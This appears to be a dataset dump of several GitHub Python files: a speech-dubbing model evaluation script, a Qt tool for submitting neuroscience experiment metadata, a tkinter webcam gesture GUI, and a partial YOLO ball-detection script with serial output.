\"generated_path\")\n reconstruct_path = os.path.join(samples_path, \"reconstruct_path\")\n os.makedirs(generated_path, exist_ok=True)\n os.makedirs(reconstruct_path, exist_ok=True)\n\n\n rec_fpath = os.path.join(reconstruct_path, \"wav_rec_{}.wav\".format(tags_batch[i]))\n pred_fpath = os.path.join(generated_path, \"wav_pred_{}.wav\".format(tags_batch[i]))\n\n write(rec_fpath, sampling_rate, wav_reconstructions_batch[i])\n write(pred_fpath, sampling_rate, wav_predictions_batch[i])\n\n rec_fpaths.append(rec_fpath)\n pred_fpaths.append(pred_fpath)\n\n\n\n\n\ndef evaluate_all_valset(model, step, configs, vocoder=None, encoder_spk=None, encoder_emo=None):\n preprocess_config, model_config, train_config, preprocess_config2 = configs\n useGT = False\n\n val_samples_path = train_config[\"path\"][\"result_path\"]\n sampling_rate = preprocess_config2[\"preprocessing\"][\"audio\"][\"sampling_rate\"]\n\n dataset_val = Dataset(\n \"val.txt\", preprocess_config2, train_config, sort=False, drop_last=False, diff_audio=True\n )\n\n loader_val = DataLoader(\n dataset_val,\n batch_size=32,\n shuffle=False,\n collate_fn=dataset_val.collate_fn,\n )\n\n print(\"Start load all val-set\", '\\n')\n print('The number of the val-set:', len(dataset_val), '\\n')\n # Get loss function\n # Loss = HPM_DubbingLoss(preprocess_config2, model_config).to(device)\n\n print(\"calculate all acc ...\")\n # initialize MCD module\n mcd_box_plain = Calculate_MCD(\"plain\", sr=sampling_rate)\n mcd_box_dtw = Calculate_MCD(\"dtw\", sr=sampling_rate)\n mcd_box_adv_dtw = Calculate_MCD(\"adv_dtw\", sr=sampling_rate)\n #\n _, _, acc_means_val_spk, acc_means_val_emo, avg_mcd_val = calculate_all_acc(preprocess_config2, \\\n model_config, model, vocoder,\n encoder_spk, encoder_emo,\n loader_val,\n sampling_rate=sampling_rate,\n samples_path=val_samples_path, \\\n mcd_box_plain=mcd_box_plain,\n mcd_box_dtw=mcd_box_dtw,\n mcd_box_adv_dtw=mcd_box_adv_dtw,\n useGT=useGT)\n\n message = \"Validation Step {}, \\\n MCD plain|dtw|adv_dtw (val): {:.4f}|{:.4f}|{:.4f}, \\\n Id. Acc (val) (rec|pred): {:.4f}|{:.4f}, \\\n Emo. Acc (val) (rec|pred): {:.4f}|{:.4f}\".format(step,\n avg_mcd_val[0], avg_mcd_val[1],\n avg_mcd_val[2], \\\n acc_means_val_spk[0],\n acc_means_val_spk[1], \\\n acc_means_val_emo[0],\n acc_means_val_emo[1]\n )\n\n return message\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--restore_step\", type=int, default=420000)\n parser.add_argument(\n \"-p\",\n \"--preprocess_config\",\n type=str,\n required=True,\n help=\"path to preprocess.yaml\",\n )\n parser.add_argument(\"-p2\", \"--preprocess_config2\", type=str,\n required=True, help=\"path to the second preprocess.yaml\",\n )\n parser.add_argument(\n \"-m\", \"--model_config\", type=str, required=True, help=\"path to model.yaml\"\n )\n parser.add_argument(\n \"-t\", \"--train_config\", type=str, required=True, help=\"path to train.yaml\"\n )\n args = parser.parse_args()\n\n # Read Config\n preprocess_config = yaml.load(\n open(args.preprocess_config, \"r\"), Loader=yaml.FullLoader\n )\n model_config = yaml.load(open(args.model_config, \"r\"), Loader=yaml.FullLoader)\n train_config = yaml.load(open(args.train_config, \"r\"), Loader=yaml.FullLoader)\n preprocess_config2 = yaml.load(\n open(args.preprocess_config2, \"r\"), Loader=yaml.FullLoader\n )\n configs = (preprocess_config, model_config, train_config, preprocess_config2)\n\n # Get model\n model = get_model(args, configs, device, train=False).to(device)\n\n # Load vocoder\n vocoder = get_vocoder(model_config, device)\n encoder_spk = VoiceEncoder().to(device)\n encoder_emo = VoiceEncoder().to(device)\n encoder_spk.eval()\n encoder_emo.eval()\n # val_samples_path = \"./output/result/MovieAnimation\"\n\n\n message = evaluate_all_valset(model, args.restore_step, configs,\n vocoder, encoder_spk, encoder_emo)\n\n print(\"Out put the result ...\")\n print(message)\n\n\n\n\n\n\n","repo_name":"GalaxyCong/HPMDubbing","sub_path":"Inference.py","file_name":"Inference.py","file_ext":"py","file_size_in_byte":15451,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"71522958811","text":"\"\"\"\nScript used to submit completed experiment to database.\n\"\"\"\n\nfrom datetime import datetime\n\nimport acq4.util.Canvas, acq4.util.DataManager\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtGui, QtCore\n\nfrom .. import metadata_submission, config\nfrom . import ui\n\n\nclass ExperimentSubmitUi(QtGui.QWidget):\n def __init__(self):\n self.path = None\n \n QtGui.QWidget.__init__(self)\n self.setWindowTitle(\"Experiment metadata QC\")\n \n self.layout = QtGui.QGridLayout()\n self.setLayout(self.layout)\n \n self.hsplit = QtGui.QSplitter(QtCore.Qt.Horizontal)\n self.layout.addWidget(self.hsplit, 0, 0)\n\n self.left_panel = QtGui.QWidget()\n self.left_layout = QtGui.QVBoxLayout()\n self.left_layout.setContentsMargins(0, 0, 0, 0)\n self.left_panel.setLayout(self.left_layout)\n self.hsplit.addWidget(self.left_panel)\n\n self.file_tree = FileTreeWidget(self)\n self.file_tree.itemSelectionChanged.connect(self.selection_changed)\n self.file_tree.itemDoubleClicked.connect(self.load_clicked)\n self.left_layout.addWidget(self.file_tree)\n \n self.ctrl_widget = QtGui.QWidget()\n self.ctrl_layout = QtGui.QGridLayout()\n self.ctrl_widget.setLayout(self.ctrl_layout)\n self.ctrl_layout.setContentsMargins(0, 0, 0, 0)\n self.left_layout.addWidget(self.ctrl_widget)\n \n row = self.ctrl_layout.rowCount()\n self.load_btn = QtGui.QPushButton('load files')\n self.load_btn.clicked.connect(self.load_clicked)\n self.ctrl_layout.addWidget(self.load_btn, row, 0)\n \n self.submit_btn = QtGui.QPushButton('submit...')\n self.submit_btn.clicked.connect(self.submit_clicked)\n self.submit_btn.setEnabled(False)\n self.ctrl_layout.addWidget(self.submit_btn, row, 1)\n\n self.vsplit = QtGui.QSplitter(QtCore.Qt.Vertical)\n self.hsplit.addWidget(self.vsplit)\n self.hsplit.setSizes([600, 700])\n \n self.canvas = acq4.util.Canvas.Canvas(allowTransforms=False)\n self.vsplit.addWidget(self.canvas)\n \n self.timeline = ui.ExperimentTimeline()\n self.vsplit.addWidget(self.timeline)\n self.vsplit.setSizes([300, 600])\n \n self.submit_window = SubmitWindow()\n \n def set_path(self, path):\n self.path = path\n if path.info().get('dirType', None) != 'Site':\n raise Exception(\"Requested path is not a site directory: %s\" % (path.name()))\n self.file_tree.set_path(path)\n self.timeline.load_site(path)\n self.canvas.clear()\n\n def load_clicked(self):\n sel = self.file_tree.selectedItems()\n for item in sel:\n fh = item.fh\n if isinstance(item, NwbTreeItem):\n self.timeline.load_nwb(fh)\n else:\n self.canvas.addFile(fh)\n\n def submit_clicked(self):\n sel = self.file_tree.selectedItems()[0]\n sub = sel.submission()\n self.submit_window.update_info(sub)\n self.submit_window.show()\n self.submit_window.activateWindow() \n\n def selection_changed(self):\n sel = self.file_tree.selectedItems()\n sub = len(sel) == 1 and sel[0].is_submittable\n self.submit_btn.setEnabled(sub)\n\n\nclass FileTreeWidget(pg.TreeWidget):\n def __init__(self, ui):\n pg.TreeWidget.__init__(self)\n self.ui = ui\n self.path = None\n self.setColumnCount(3)\n self.setHeaderLabels(['file', 'category', 'metadata'])\n self.setSelectionMode(self.ExtendedSelection)\n self.setDragDropMode(self.NoDragDrop)\n \n # attempts to retain background colors on selected items:\n #self.setAllColumnsShowFocus(False)\n #self.itemSelectionChanged.connect(self._selection_changed)\n #self.style_delegate = StyleDelegate(self)\n #self.setItemDelegateForColumn(1, self.style_delegate)\n\n def set_path(self, path):\n self.path = path\n self._reload_file_tree()\n \n def _reload_file_tree(self):\n self.clear()\n \n dh = self.path.parent()\n root = self.invisibleRootItem()\n self._fill_tree(dh, root)\n \n def _fill_tree(self, dh, root):\n self.items = {}\n for fname in dh.ls():\n fh = dh[fname]\n if fh.isDir() and fh is not self.path:\n # exclude everything outside the selected site\n continue\n item = self._make_item(fh)\n self.items[fh] = item\n if hasattr(item, 'type_selected'):\n item.type_selected.connect(self._item_type_selected)\n \n root.addChild(item)\n item.setExpanded(True)\n item.fh = fh\n if fh.isDir():\n self._fill_tree(fh, item)\n \n for i in range(3):\n self.resizeColumnToContents(i)\n \n def _make_item(self, fh):\n info = fh.info()\n objtyp = info.get('__object_type__')\n \n if fh.isDir():\n dirtyp = info.get('dirType', None)\n dtyps = {'Experiment': ExperimentTreeItem, 'Slice': SliceTreeItem, 'Site': SiteTreeItem}\n if dirtyp in dtyps:\n return dtyps[dirtyp](self.ui, fh)\n \n if objtyp in ['ImageFile', 'MetaArray']:\n return ImageTreeItem(self.ui, fh)\n \n elif fh.shortName().lower().endswith('.nwb'):\n return NwbTreeItem(self.ui, fh)\n \n elif fh.shortName().startswith('MultiPatch_'):\n return MPLogTreeItem(self.ui, fh)\n \n item = TypeSelectItem(self.ui, fh, ['ignore'], 'ignore')\n return item\n\n def _item_type_selected(self, item, typ):\n for item in self.selectedItems():\n item.set_type(typ)\n self.resizeColumnToContents(1)\n\n ###### attempts to retain background colors on selected items:\n #def _selection_changed(self):\n ## Only select first column\n #try:\n #self.blockSignals(True)\n #for i in self.selectionModel().selectedIndexes():\n #if i.column() != 0:\n #self.selectionModel().select(i, QtGui.QItemSelectionModel.Deselect)\n #finally:\n #self.blockSignals(False)\n\n #def mousePressEvent(self, ev):\n #if ev.button() == QtCore.Qt.RightButton:\n #print('press')\n #ev.accept()\n #else:\n #pg.TreeWidget.mousePressEvent(self, ev)\n\n #def mouseReleaseEvent(self, ev):\n #if ev.button() == QtCore.Qt.RightButton:\n #index = self.indexAt(ev.pos())\n #item, col = self.itemFromIndex(index)\n #print('release', item, col)\n #self._itemClicked(item, col)\n #else:\n #pg.TreeWidget.mouseReleaseEvent(self, ev)\n\n\n#class StyleDelegate(QtGui.QStyledItemDelegate):\n #def __init__(self, table):\n #QtGui.QStyledItemDelegate.__init__(self)\n #self.table = table\n \n #def paint(self, painter, option, index):\n ##print(index.row(), index.column())\n #QtGui.QStyledItemDelegate.paint(self, painter, option, index)\n\n\nclass ExperimentTreeItem(pg.TreeWidgetItem):\n def __init__(self, ui, fh):\n self.fh = fh\n pg.TreeWidgetItem.__init__(self, [fh.shortName()])\n\n\nclass SliceTreeItem(pg.TreeWidgetItem):\n def __init__(self, ui, fh):\n self.fh = fh\n self.is_submittable = False\n \n #in_db = database.slice_from_timestamp(datetime.fromtimestamp(fh.info()['__timestamp__']))\n #if len(in_db) == 0:\n #status = \"NOT SUBMITTED\"\n #else:\n #status = \"submitted\"\n pg.TreeWidgetItem.__init__(self, [fh.shortName(), ''])\n\n\nclass SiteTreeItem(pg.TreeWidgetItem):\n def __init__(self, ui, fh):\n self.fh = fh\n self.ui = ui\n self.is_submittable = True\n\n pg.TreeWidgetItem.__init__(self, [fh.shortName(), ''])\n \n def submission(self):\n pips = self.ui.timeline.save()\n files = self.list_files()\n \n return metadata_submission.ExperimentMetadataSubmission(\n site_dh=self.fh, \n files=files,\n pipettes=pips,\n )\n \n def list_files(self):\n \"\"\"Generate a structure describing all files associated with this \n experiment (site) and its parent slice.\n \"\"\"\n files = []\n slice_dir = self.fh.parent()\n slice_item = self.parent()\n if slice_item is None:\n slice_item = self.treeWidget().invisibleRootItem()\n \n for parent in [slice_item, self]:\n childs = [parent.child(i) for i in range(parent.childCount())]\n for item in childs:\n if not item.fh.isFile():\n continue\n typ = item.type()\n if typ == 'ignore':\n continue\n files.append({'path': item.fh.name(relativeTo=slice_dir), 'category': typ})\n return files\n \n\n\nclass TypeSelectItem(pg.TreeWidgetItem):\n \"\"\"TreeWidgetItem with a type selection menu in the second column.\n \"\"\"\n class Signals(QtCore.QObject):\n type_selected = QtCore.Signal(object, object)\n \n def __init__(self, ui, fh, types, current_type):\n self.is_submittable = False\n self.fh = fh\n self._sigprox = ImageTreeItem.Signals()\n self.type_selected = self._sigprox.type_selected\n self.types = types\n pg.TreeWidgetItem.__init__(self, [fh.shortName(), '', ''])\n\n self.menu = QtGui.QMenu()\n for typ in self.types:\n act = self.menu.addAction(typ, self._type_selected)\n \n self.set_type(current_type)\n\n def _type_selected(self):\n action = self.treeWidget().sender()\n text = str(action.text()).strip()\n self.set_type(text)\n self.type_selected.emit(self, text)\n \n def set_type(self, typ):\n self.setText(1, typ)\n if typ == 'ignore':\n self.setBackground(1, pg.mkColor(0.9))\n else:\n self.setBackground(1, pg.mkColor('w'))\n\n def type(self):\n return self.text(1)\n\n def itemClicked(self, col):\n if col != 1:\n return\n tw = self.treeWidget()\n x = tw.header().sectionPosition(col)\n y = tw.header().height() + tw.visualItemRect(self).bottom()\n self.menu.popup(tw.mapToGlobal(QtCore.QPoint(x, y)))\n return None\n \n\nclass NwbTreeItem(TypeSelectItem):\n def __init__(self, ui, fh):\n types = ['ignore', 'MIES physiology']\n if fh.parent().info().get('dirType') == 'Site':\n typ = 'MIES physiology'\n else:\n typ = 'ignore'\n TypeSelectItem.__init__(self, ui, fh, types, typ)\n \n\nclass MPLogTreeItem(TypeSelectItem):\n def __init__(self, ui, fh):\n types = ['ignore', 'Multipatch log']\n if fh.parent().info().get('dirType') == 'Site':\n typ = types[1]\n else:\n typ = 'ignore'\n TypeSelectItem.__init__(self, ui, fh, types, typ)\n \n\nclass ImageTreeItem(TypeSelectItem):\n def __init__(self, ui, fh):\n info = fh.info()\n obj = fh.info().get('objective', '')\n\n # Make initial guess on image type\n typ = 'ignore'\n ptype = fh.parent().info().get('dirType')\n if ptype == 'Site':\n typ = 'recording site'\n elif ptype == 'Slice':\n if obj.startswith('40x'):\n typ = 'slice quality stack'\n if obj.startswith('4x'):\n typ = 'slice anatomy'\n\n types = ['ignore', 'slice anatomy', 'slice quality stack', 'recording site']\n TypeSelectItem.__init__(self, ui, fh, types, typ)\n \n self.setText(2, obj)\n illumination = info.get('illumination', {})\n if illumination is not None:\n colors = list(illumination.keys())\n else:\n colors = []\n if len(colors) == 0:\n color = 'w'\n elif len(colors) > 1:\n color = 'y'\n else:\n color = {'infrared': (255, 230, 230), 'green': (230, 255, 230), 'blue': (230, 230, 255), 'uv': (255, 220, 255)}[colors[0]]\n self.setBackground(2, pg.mkColor(color))\n \n\nclass SubmitWindow(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.resize(800, 800)\n \n self.layout = QtGui.QGridLayout()\n self.setLayout(self.layout)\n \n self.message_text = QtGui.QTextBrowser()\n self.message_text.setOpenExternalLinks(True)\n self.layout.addWidget(self.message_text, 0, 0)\n \n self.info_tree = pg.DataTreeWidget()\n self.info_tree.setColumnHidden(1, True)\n self.layout.addWidget(self.info_tree, 0, 1)\n \n self.submit_btn = QtGui.QPushButton('submit!')\n self.submit_btn.clicked.connect(self.submit)\n self.layout.addWidget(self.submit_btn, 1, 1)\n \n def update_info(self, submission):\n self.submission = submission\n errors, warnings = submission.check()\n messages = ''\n for name, msgs in [('errors', errors), ('warnings', warnings)]:\n if len(msgs) == 0:\n messages += \"

No %s.



\" % name\n else:\n messages += \"

%s:


\\n
    \\n\" % name.capitalize()\n for msg in msgs:\n messages += \"
  • \" + msg + \"
    \\n\"\n messages += \"


\\n\"\n \n self.message_text.setHtml(messages)\n \n summary = submission.summary()\n self.info_tree.setData(summary)\n \n def submit(self):\n if len(self.submission.check()[0]) > 0:\n raise Exception(\"Can't submit; experiment has errors.\")\n self.submission.submit()\n self.hide()\n \n \n\n\ndef submit(data):\n print(\"Submitting \", data)\n session = Session()\n \n\n\n \nif __name__ == '__main__':\n import sys\n app = pg.mkQApp()\n pg.dbg()\n \n path = acq4.util.DataManager.getDirHandle(sys.argv[1])\n ui = ExperimentSubmitUi()\n ui.resize(1600, 1000)\n ui.show()\n ui.set_path(path)\n \n if sys.flags.interactive == 0:\n app.exec_()\n","repo_name":"timjarsky/aisynphys","sub_path":"aisynphys/ui/submit_expt.py","file_name":"submit_expt.py","file_ext":"py","file_size_in_byte":14307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74173239451","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 7 22:51:42 2020\r\n\r\n@author: rajku\r\n\"\"\"\r\n\r\n\r\nimport tkinter;\r\nfrom tkinter import ttk;\r\nimport cv2\r\nimport numpy\r\nfrom PIL import Image, ImageTk\r\n\r\n'''\r\n\r\nGUI window template\r\n\r\n1)Control input image transformation window\r\nwill contain buttons to launch new windows showing \r\nbinary ,grayscale,and original\r\n\r\n2)Drawing control Window\r\n\r\nControl whether to show the convex hull , or the defects \r\n\r\n\r\n1) \r\nCreate a window using tkinter\r\ncreate 3 buttons\r\nuse grid() to align\r\nuse pack() \r\nCreate three command functions\r\n\r\n\r\n\r\n'''\r\n\r\n\r\n'''\r\nI am thinking of making a main window and then launching two \r\nwindows separately one at at time (maybe )\r\none to just make it black and white \r\nand other to add convex hull and dots.\r\n'''\r\n\r\n\r\n'''\r\nThis below class is to show binary transformation of captured image\r\n'''\r\n\r\nclass GUI_test:\r\n \r\n '''\r\n This below function is just to initialize stuff and start the main\r\n windows\r\n '''\r\n def __init__(self):\r\n #Some internal variables\r\n self.bin_flag=1\r\n self.set_bin_flag=cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU\r\n \r\n self.root=tkinter.Tk();\r\n self.frame=ttk.Frame(self.root,width=600,height=400).grid(columnspan=4,rowspan=4);\r\n #self.image_disp=tkinter.PhotoImage(\"test.png\")\r\n self.frame_2=ttk.Frame(self.root,width=300,height=200,relief=tkinter.RIDGE, borderwidth=2)\r\n self.Image_proc=None\r\n self.frame_2.grid(rowspan=3,columnspan=3)\r\n #Buttons for frame_2\r\n self.btn_Bin=ttk.Button(self.frame_2,text=\"Make Binary\")\r\n #self.btn_Bin=ttk.Button(self.frame_2,text=\"Add convex hull \")\r\n self.btn_switch=ttk.Button(self.frame_2,text=\"Switch Black and white\")\r\n \r\n #self.btn_Bin=ttk.Button(self.frame_2,text=\"Add center defects\")\r\n #bindings for frame_2\r\n self.btn_Bin.bind(\"\",self.binary)\r\n self.btn_Bin.grid(row=0,column=0)\r\n self.btn_switch.bind(\"\",self.Switch_bin)\r\n self.btn_switch.grid(row=1,column=0)\r\n self.cap=None\r\n self.label=ttk.Label(self.frame,text=\"test\")\r\n self.label.bind(\"\",self.update)\r\n self.button=ttk.Button(self.frame,text=\"Exit\")\r\n self.button.bind(\"\",self.close)\r\n self.button.grid(row=3,column=0)\r\n self.label.grid(row=0,column=0)\r\n \r\n self.root.mainloop()\r\n \r\n '''\r\n This below function is to capture a image from webcam\r\n and convert it into a format that can be displayed on the \r\n window\r\n '''\r\n \r\n def update(self,event):\r\n self.cap=cv2.VideoCapture(0)\r\n ret,img_arr=self.cap.read()\r\n self.Image_proc=img_arr\r\n cv2.imwrite(\"test.png\", img_arr)\r\n load=Image.open(\"test.png\")\r\n img_disp=ImageTk.PhotoImage(load)\r\n \r\n self.label.configure(text=\"\",image=img_disp);\r\n self.label.image=img_disp\r\n #self.label.place(x=0,y=0)\r\n \r\n \r\n \r\n '''\r\n This below function is to trigger conversation into a binary \r\n image from the original colour and display it in the label\r\n \r\n '''\r\n \r\n \r\n def binary(self,event):\r\n gray = cv2.cvtColor(self.Image_proc,cv2.COLOR_BGR2GRAY)\r\n blur = cv2.GaussianBlur(gray,(5,5),0)\r\n ret,thresh1 = cv2.threshold(blur,70,255,self.set_bin_flag)\r\n cv2.imwrite(\"test.png\", thresh1)\r\n load=Image.open(\"test.png\")\r\n img_disp=ImageTk.PhotoImage(load)\r\n self.label.configure(image=img_disp)\r\n self.label.image=img_disp\r\n \r\n\r\n '''\r\n The below function is to switch between black and white \r\n whenever is necessary based on the background \r\n because if for some reason I can't control whether my hand \r\n is painted white or black it will be useful for getting output and\r\n demo\r\n '''\r\n def Switch_bin(self,event):\r\n \r\n if(self.bin_flag==1):\r\n self.set_bin_flag=cv2.THRESH_OTSU\r\n self.bin_flag=0\r\n elif self.bin_flag==0:\r\n self.set_bin_flag=cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU\r\n self.bin_flag=1\r\n \r\n \r\n \r\n \r\n def close(self,event):\r\n while(self.cap.isOpened()):\r\n self.cap.release()\r\n\r\n\r\n\r\n\r\n\r\n'''\r\nThis class below is to add convex hull and defects to image\r\n'''\r\n\r\nclass GUI_defect:\r\n def __init__(self):\r\n self.root=tkinter.Tk();\r\n self.frame=ttk.Frame(self.root,width=600,height=400).grid(columnspan=4,rowspan=4);\r\n #self.image_disp=tkinter.PhotoImage(\"test.png\")\r\n self.frame_2=ttk.Frame(self.root,width=300,height=200,relief=tkinter.RIDGE, borderwidth=2)\r\n self.Image_proc=None\r\n self.frame_2.grid(rowspan=3,columnspan=3)\r\n #Buttons for frame_2\r\n #self.btn_Bin=ttk.Button(self.frame_2,text=\"Make Binary\")\r\n self.btn_Bin=ttk.Button(self.frame_2,text=\"Add convex hull \")\r\n \r\n\r\ndefect=GUI_defect()\r\n\r\n#The reason why it was showing that early error was \r\n#that after mainloop is started ,it will check for events\r\n#but i guess it must be builtin that to check if the loop is either\r\n#have not run or something like that,its not related to Tk() alone\r\n#so thats why I am going to try another approach\r\n\r\n\r\n","repo_name":"coolstar8836/Gesutre-recognition-tutorial-code","sub_path":"GUI_test.py","file_name":"GUI_test.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"362887073","text":"from ctypes import *\nimport random\nimport os\nimport cv2\nimport time\nimport darknet\nimport numpy as np\nimport argparse\nimport array\nimport serial\nfrom threading import Thread, enumerate\nfrom queue import Queue\nserial_name = '/dev/usbcam'\n\n\n\n#####################################\nTHRESHOLD=85 \nDEPTH_COEFFICIENT=0.09 \nX_BIAS=0 \nX_DEVIATION=15 \n#####################################\n\n\n\n\n\nclass RB(object):\n def __init__(self):\n self.classes = []\n self.scores = []\n self.boxes = np.array([])\n self.scores = []\n self.x = 0\n self.y = 0\n self.d = 0\n self.s = 0\n self.img =np.ones((3,3),dtype=np.uint8)\n self.cmd = 'b'\n self.can_be_sent = False\n self.fps = 0\n self.depth_coefficient=0\n self.select_threshold = 0\n self.windowname = 'find_ball'\n self.windowname_= \"setting\"\n self.x_bias=0\n self.x_deviation=0\n\ndef parser():\n parser = argparse.ArgumentParser(description=\"YOLO Object Detection\")\n parser.add_argument(\"--input\", type=str, default=2,\n help=\"video source. If empty, uses webcam 0 stream\")\n parser.add_argument(\"--out_filename\", type=str, default=\"\",\n help=\"inference video name. Not saved if empty\")\n parser.add_argument(\"--weights\", default=\"./model/yolov4-tiny_last4.weights\",\n help=\"yolo weights path\")\n parser.add_argument(\"--dont_show\", action='store_true',\n help=\"windown inference display. For headless systems\")\n parser.add_argument(\"--ext_output\", action='store_true',\n help=\"display bbox coordinates of detected objects\")\n parser.add_argument(\"--config_file\", default=\"./cfg/yolov4-tiny-ball.cfg\",\n help=\"path to config file\")\n parser.add_argument(\"--data_file\", default=\"./cfg/coco.data\",\n help=\"path to data file\")\n parser.add_argument(\"--thresh\", type=float, default=.85,\n help=\"remove detections with confidence below this value\")\n return parser.parse_args()\n\n\ndef str2int(video_path):\n \"\"\"\n argparse returns and string althout webcam uses int (0, 1 ...)\n Cast to int if needed\n \"\"\"\n try:\n return int(video_path)\n except ValueError:\n return video_path\n\n\ndef check_arguments_errors(args):\n assert 0 < args.thresh < 1, \"Threshold should be a float between zero and one (non-inclusive)\"\n if not os.path.exists(args.config_file):\n raise(ValueError(\"Invalid config path {}\".format(os.path.abspath(args.config_file))))\n if not os.path.exists(args.weights):\n raise(ValueError(\"Invalid weight path {}\".format(os.path.abspath(args.weights))))\n if not os.path.exists(args.data_file):\n raise(ValueError(\"Invalid data file path {}\".format(os.path.abspath(args.data_file))))\n if str2int(args.input) == str and not os.path.exists(args.input):\n raise(ValueError(\"Invalid video path {}\".format(os.path.abspath(args.input))))\n\n\ndef set_saved_video(input_video, output_video, size):\n fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n fps = int(input_video.get(cv2.CAP_PROP_FPS))\n video = cv2.VideoWriter(output_video, fourcc, fps, size)\n return video\n\n\ndef convert2relative(bbox):\n \"\"\"\n YOLO format use relative coordinates for annotation\n \"\"\"\n x, y, w, h = bbox\n _height = darknet_height\n _width = darknet_width\n return x/_width, y/_height, w/_width, h/_height\n\n\ndef convert2original(image, bbox):\n x, y, w, h = convert2relative(bbox)\n\n image_h, image_w, __ = image.shape\n\n orig_x = int(x * image_w)\n orig_y = int(y * image_h)\n orig_width = int(w * image_w)\n orig_height = int(h * image_h)\n\n bbox_converted = (orig_x, orig_y, orig_width, orig_height)\n\n return bbox_converted\n\n\ndef convert4cropping(image, bbox):\n x, y, w, h = convert2relative(bbox)\n\n image_h, image_w, __ = image.shape\n\n orig_left = int((x - w / 2.) * image_w)\n orig_right = int((x + w / 2.) * image_w)\n orig_top = int((y - h / 2.) * image_h)\n orig_bottom = int((y + h / 2.) * image_h)\n\n if (orig_left < 0): orig_left = 0\n if (orig_right > image_w - 1): orig_right = image_w - 1\n if (orig_top < 0): orig_top = 0\n if (orig_bottom > image_h - 1): orig_bottom = image_h - 1\n\n bbox_cropping = (orig_left, orig_top, orig_right, orig_bottom)\n\n return bbox_cropping\n\n\ndef video_capture(frame_queue, darknet_image_queue):\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret:\n break\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame_resized = cv2.resize(frame_rgb, (darknet_width, darknet_height),\n interpolation=cv2.INTER_LINEAR)\n frame_queue.put(frame)\n img_for_detect = darknet.make_image(darknet_width, darknet_height, 3)\n darknet.copy_image_from_bytes(img_for_detect, frame_resized.tobytes())\n darknet_image_queue.put(img_for_detect)\n cap.release()\n\n\ndef inference(darknet_image_queue, detections_queue, fps_queue,rb):\n while cap.isOpened():\n darknet_image = darknet_image_queue.get()\n prev_time = time.time()\n detections = darknet.detect_image(network, class_names, darknet_image, thresh=rb.select_threshold/100)\n #print(detections,'detections')\n detections_queue.put(detections)\n fps = int(1/(time.time() - prev_time))\n fps_queue.put(fps)\n #print(\"FPS: {}\".format(fps))\n darknet.print_detections(detections, args.ext_output)\n darknet.free_image(darknet_image)\n cap.release()\n\n\ndef drawing(frame_queue, detections_queue, fps_queue,rb):\n def nothing(x):\n pass\n cv2.namedWindow(rb.windowname,0)\n cv2.namedWindow(rb.windowname_,0)\n cv2.createTrackbar('thresh',rb.windowname_,int(rb.select_threshold),100,nothing)\n cv2.createTrackbar('depth',rb.windowname_,50,100,nothing)\n cv2.createTrackbar('x-bias',rb.windowname_,50,100,nothing)\n cv2.createTrackbar('x-deviation',rb.windowname_,X_DEVIATION,100,nothing)\n def c_dis(cclass, r, f): \n if cclass == 1:\n d = 2460 * f / r \n elif cclass == 2:\n d = 2100 * f / r\n return d\n random.seed(3) # deterministic bbox colors\n video = set_saved_video(cap, args.out_filename, (darknet_width, darknet_height))\n while cap.isOpened():\n rb.depth_coefficient=cv2.getTrackbarPos('depth',rb.windowname_)/50*DEPTH_COEFFICIENT\n rb.select_threshold=cv2.getTrackbarPos('thresh',rb.windowname_)\n rb.x_bias=int(cv2.getTrackbarPos('x-bias',rb.windowname_)-50)+X_BIAS\n rb.x_deviation=cv2.getTrackbarPos('x-deviation',rb.windowname_)\n frame = frame_queue.get()\n frame=cv2.resize(frame,(1280,960))\n detections = detections_queue.get()\n fps = fps_queue.get()\n detections_adjusted = []\n if frame is not None:\n if rb.cmd == '5' or rb.cmd == 'b':\n label_detect=\"basketball\"\n bclass=1\n if rb.cmd == '6' or rb.cmd == 'v':\n label_detect=\"volleyball\" \n bclass=2\n detections=[n for n in detections if n[0]==label_detect]\n _detections=[]\n for a,b,x in detections:\n _detections.append(x[2]*x[2]+x[3]*x[3])\n try:\n detections=detections[_detections.index(max(_detections))]\n #print(_detections)\n except:\n pass\n #_detections=[(x[0]-x[2])*(x[0]-x[2])+(x[1]-x[3])*(x[1]-x[3]) for x in list(detections)[:,2]]\n #print(_detections,'dddddd')\n if(len(detections)):\n\n label, confidence, bbox = detections[0],detections[1],detections[2]\n \n bbox_adjusted = convert2original(frame, bbox)\n rb.x=512-int(512*bbox_adjusted[0]/frame.shape[1])+rb.x_bias\n rb.y=int(bbox_adjusted[1])\n rb.d = c_dis(bclass, bbox_adjusted[2]/frame.shape[1],rb.depth_coefficient)\n \n #print(bbox_adjusted,'origin')\n detections_adjusted.append((str(label), confidence, bbox_adjusted))\n s=\"s:\"+confidence\n else:\n s=\"s:NONE\" \n rb.x=0\n rb.y=0\n rb.d=0\n image = darknet.draw_boxes(detections_adjusted, frame, class_colors)\n if rb.cmd == '5':\n s1 = 'cmd:5 finding basketball'\n elif rb.cmd == '6':\n s1 = 'cmd:6 finding volleyball'\n elif rb.cmd == 'b':\n s1 = '1-3 basketball'\n elif rb.cmd == 'v':\n s1 = '4-6 volleyball'\n else:\n s1 = 'wrong cmd %s' %rb.cmd\n cv2.putText(image, s1,(20,50), cv2.FONT_HERSHEY_DUPLEX,2, (28,150,36), 2)\n cv2.putText(image,s,(500,150), cv2.FONT_HERSHEY_DUPLEX,2, (18,87,220), 2)\n cv2.putText(image,\"x:%d\"%rb.x,(20,150), cv2.FONT_HERSHEY_DUPLEX,2, (18,87,220), 2)\n cv2.putText(image,\"d:%d\"%rb.d,(220,150), cv2.FONT_HERSHEY_DUPLEX,2, (18,87,220), 2)\n cv2.putText(image, \"fps:%.1f\"%fps,(20,250), 